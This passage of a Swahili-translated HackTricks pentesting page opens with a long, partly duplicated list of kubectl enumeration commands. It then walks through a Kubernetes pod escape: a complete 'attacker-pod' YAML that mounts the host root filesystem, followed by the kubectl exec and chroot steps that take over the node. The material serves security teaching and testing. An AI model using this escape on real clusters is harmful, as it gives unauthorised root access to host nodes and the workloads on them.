    • kubectl get all -o custom-columns=:.status.podIP

    • kubectl get all -o custom-columns=:.status.qosClass

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.startTime

    • kubectl get all -o custom-columns=:.status.containerStatuses

    • kubectl get all -o custom-columns=:.status.lastProbeTime

    • kubectl get all -o custom-columns=:.status.lastTransitionTime

    • kubectl get all -o custom-columns=:.status.ready

    • kubectl get all -o custom-columns=:.status.restartCount

    • kubectl get all -o custom-columns=:.status.image

    • kubectl get all -o custom-columns=:.status.imageID

    • kubectl get all -o custom-columns=:.status.containerID

    • kubectl get all -o custom-columns=:.status.started

    • kubectl get all -o custom-columns=:.status.finishedAt

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.message

    • kubectl get all -o custom-columns=:.status.phase

    • kubectl get all -o custom-columns=:.status.podIP

    • kubectl get all -o custom-columns=:.status.qosClass

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.startTime

    • kubectl get all -o custom-columns=:.status.containerStatuses

    • kubectl get all -o custom-columns=:.status.lastProbeTime

    • kubectl get all -o custom-columns=:.status.lastTransitionTime

    • kubectl get all -o custom-columns=:.status.ready

    • kubectl get all -o custom-columns=:.status.restartCount

    • kubectl get all -o custom-columns=:.status.image

kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps

Pata "zote"

k get all

Pata Matumizi ya Pods

k top pod --all-namespaces

Kutoroka kutoka kwa podi

Ikiwa unaweza kuunda podi mpya, huenda ukaweza kutoroka kutoka kwao kwenda kwenye node. Ili kufanya hivyo, unahitaji kuunda podi mpya kwa kutumia faili ya yaml, kubadilisha kwenye podi iliyoundwa na kisha kufanya chroot kuingia kwenye mfumo wa node. Unaweza kutumia podi zilizopo kama marejeo kwa faili ya yaml kwani zinaonyesha picha na njia zilizopo.

kubectl get pod <name> [-n <namespace>] -o yaml

ikiwa unahitaji kuunda podi kwenye node maalum, unaweza kutumia amri ifuatayo kupata lebo kwenye node

k get nodes --show-labels

Kwa kawaida, kubernetes.io/hostname na node-role.kubernetes.io/master ni lebo nzuri kwa uteuzi.

Kisha unaweza kuunda faili yako ya attack.yaml

apiVersion: v1
kind: Pod
metadata:
labels:
run: attacker-pod
name: attacker-pod
namespace: default
spec:
volumes:
- name: host-fs
hostPath:
path: /
containers:
- image: ubuntu
imagePullPolicy: Always
name: attacker-pod
command: ["/bin/sh", "-c", "sleep infinity"]
volumeMounts:
- name: host-fs
mountPath: /root
restartPolicy: Never
# nodeName and nodeSelector enable one of them when you need to create pod on the specific node
#nodeName: master
#nodeSelector:
#  kubernetes.io/hostname: master
# or using
#  node-role.kubernetes.io/master: ""

chanzo cha yaml kilichobadilishwa

Baada ya hapo unajenga podi

kubectl apply -f attacker.yaml [-n <namespace>]

Sasa unaweza kubadilisha kwenye pod iliyoundwa kama ifuatavyo

kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file

Na mwishowe unachroot ndani ya mfumo wa node.

chroot /root /bin/bash

Maelezo yaliyopatikana kutoka: Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1 Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1

Marejeo

LogoKubernetes Pentest Methodology Part 3CyberArk
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

PreviousAttacking Kubernetes from inside a PodNextKubernetes Role-Based Access Control(RBAC)

Last updated